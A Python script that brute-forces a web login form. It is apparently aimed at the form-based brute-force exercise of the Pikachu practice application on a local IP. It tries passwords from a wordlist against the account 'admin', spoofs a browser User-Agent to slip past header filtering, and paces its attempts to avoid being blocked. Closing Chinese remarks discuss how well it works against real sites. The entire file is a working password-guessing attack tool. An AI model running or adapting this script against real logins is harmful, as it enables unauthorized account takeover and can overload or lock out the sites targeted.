import requests
import time
# Login form under test. The path looks like the form-based brute-force
# exercise of the Pikachu practice application; replace with the actual target URL.
url = "http://192.168.3.101/pikachu/vul/burteforce/bf_form.php"

# Account name that is already known; only the password is varied.
username = "admin"

# Path of the password wordlist, one candidate per line.
password_file = "passwords.txt"

# Browser-like User-Agent sent with every request instead of the client
# library's default, so the requests are not filtered on that header.
# The header is fully client-controlled, which is why a User-Agent check on
# its own is a weak signal for spotting automated logins.
headers = {
    "User-Agent": (
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
        "AppleWebKit/537.36 (KHTML, like Gecko) "
        "Chrome/91.0.4472.124 Safari/537.36"
    ),
}
def login_attempt(username, password):
    """Submit one username/password pair to the login form.

    A fresh ``requests.Session`` is created for every call. The form page is
    fetched first, then the credentials are POSTed to the same URL with the
    module-level ``headers``.

    Args:
        username: Account name placed in the ``username`` form field.
        password: Candidate password placed in the ``password`` form field.

    Returns:
        True if the response body contains "login success" (compared
        case-insensitively), otherwise False.

    Side effects:
        Overwrites ``response.txt`` with the response body on every call and
        prints the tried password in clear text to stdout.
    """
    client = requests.Session()
    # The GET response itself is not used; presumably it is issued so that any
    # cookie the form page sets is sent with the POST -- confirm against the target.
    client.get(url, headers=headers)

    # Form fields as submitted to the login page.
    form_fields = {
        'username': username,
        'password': password,
        'submit': 'Login',
    }
    reply = client.post(url, data=form_fields, headers=headers)
    page = reply.text

    # Debug aid: the file is opened in 'w' mode, so only the most recent
    # response is kept.
    with open('response.txt', 'w', encoding='utf-8') as dump:
        dump.write(page)

    # Success is decided purely by a substring match on the page text.
    # NOTE(review): any page that contains this phrase for another reason
    # would also be reported as a hit.
    if "login success" not in page.lower():
        print(f"[-] Incorrect password: {password}")
        return False

    print(f"[+] Password found: {password}")
    return True
# Read the wordlist and try each entry in order, stopping at the first hit.
with open(password_file, 'r', encoding='utf-8') as wordlist:
    for raw_line in wordlist:
        # Surrounding whitespace and the trailing newline are dropped; a blank
        # line in the wordlist is therefore submitted as an empty password.
        candidate = raw_line.strip()
        if login_attempt(username, candidate):
            break
        # One-second pause after every failed attempt, so the requests are
        # spaced out and the client is not blocked. This also caps the load
        # on the server at roughly one login request per second.
        time.sleep(1)
不过话说回来,这种毫无防护的后台现在已经不多了,大部分都加了验证码或登录失败次数限制,所以这个脚本基本也派不上什么用场。
不建议把它改成多线程:小网站真的可能被扫到崩溃,大网站则有封 IP 的风险。